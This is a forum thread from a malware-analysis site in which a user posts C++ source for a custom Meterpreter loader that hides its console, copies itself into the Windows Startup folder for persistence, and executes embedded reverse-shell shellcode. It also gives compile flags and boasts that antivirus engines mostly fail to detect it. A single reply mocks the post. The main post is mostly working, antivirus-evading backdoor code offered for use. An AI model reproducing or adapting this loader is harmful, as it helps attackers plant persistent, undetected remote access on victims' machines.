A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about user-mode development.
 #30039  by kd77
 Sun Feb 26, 2017 2:23 pm
Hi, I thought I should start contributing to this forum because its a sound forum! :lol: :lol: :lol:

I was doing some pentesting in my hacking lab and I came across a problem when using Meterpreter. Automation and persistence, yes I know there are already premade modules for this but they're not very Anti-Virus friendly!
What my overall goal was to create a custom meterpreter payload that would try and connect back to my host an infinite amount of times, copy itself to the "C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" for persistence (Yes I know if a had a meterpreter session on the hacked computer, I could just move the payload myself manually. But that takes to much time!).

So I firstly picked my payload the x86 meterpreter_reverse_tcp and generated the shellcode into a C format and removed the bad chars like '\x00' and '\xFF'.

And then I programmed this PoC custom meterpreter payload. (I've been Learning C++ for a couple of weeks now so my code is not great but it gets the job done!).
Code: Select all

#include <iostream>
#include "windows.h"

using namespace std;

unsigned char buf[] =
"\x89\xe0\xd9\xed\xd9\x70\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" etc.. etc..

// Meterpreter generated shellcode with bad chars removed.

// http://stackoverflow.com/questions/622592/win32-programming-hiding-console-window#622666
void HideConsoleWindow()
{
 HWND HideConsoleWindow;
 AllocConsole();
 HideConsoleWindow = FindWindowA("ConsoleWindowClass", NULL);
 ShowWindow(HideConsoleWindow,0);
}

// char** argv points to the location of the executable being run.
int main(int argc, char** argv)
{

HideConsoleWindow();
    // Copy file to Windows start up.
CopyFile(argv[0], "C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\copied_payload.exe", 0);

    // Declare pointer on function.
    int (*func) ();

    // Cast shellcode into function.
    func = (int (*) ()) buf;

    // Call function (Execute shellcode).
    (int) (*func) ();

    return 0;
}
And thats my payload, I compiled my source code using GCC and the following flags.
Code: Select all
mingw32-g++.exe -Wall -O2 -fomit-frame-pointer -fexpensive-optimizations -Os -m32  -c "C:\Users\user\Documents\Code blocks\Meterpreter\main.cpp" -o obj\Release\main.o
mingw32-g++.exe  -o bin\Release\Meterpreter.exe obj\Release\main.o  -s -s -m32 -static-libgcc -static-libstdc++ 
And it worked like a charm! I also thought I'd give it an Anti-Virus scan because I was thinking the CopyFile to start up would surely flag?

https://www.virustotal.com/en/file/8773 ... 488118618/

Only 4 AV's out of 55 and the Anti-Virus I was against in my lab was avast!

I ran my custom payload on the Windows machine in my lab as admin, and escalated to NT system and no Anti-Virus flagging or Behavioural flagging came up!

Thanks for reading mate. :)
 #30041  by EP_X0FF
 Sun Feb 26, 2017 4:54 pm
Wow. So impressive. So FUD. I think you registered on the wrong forum.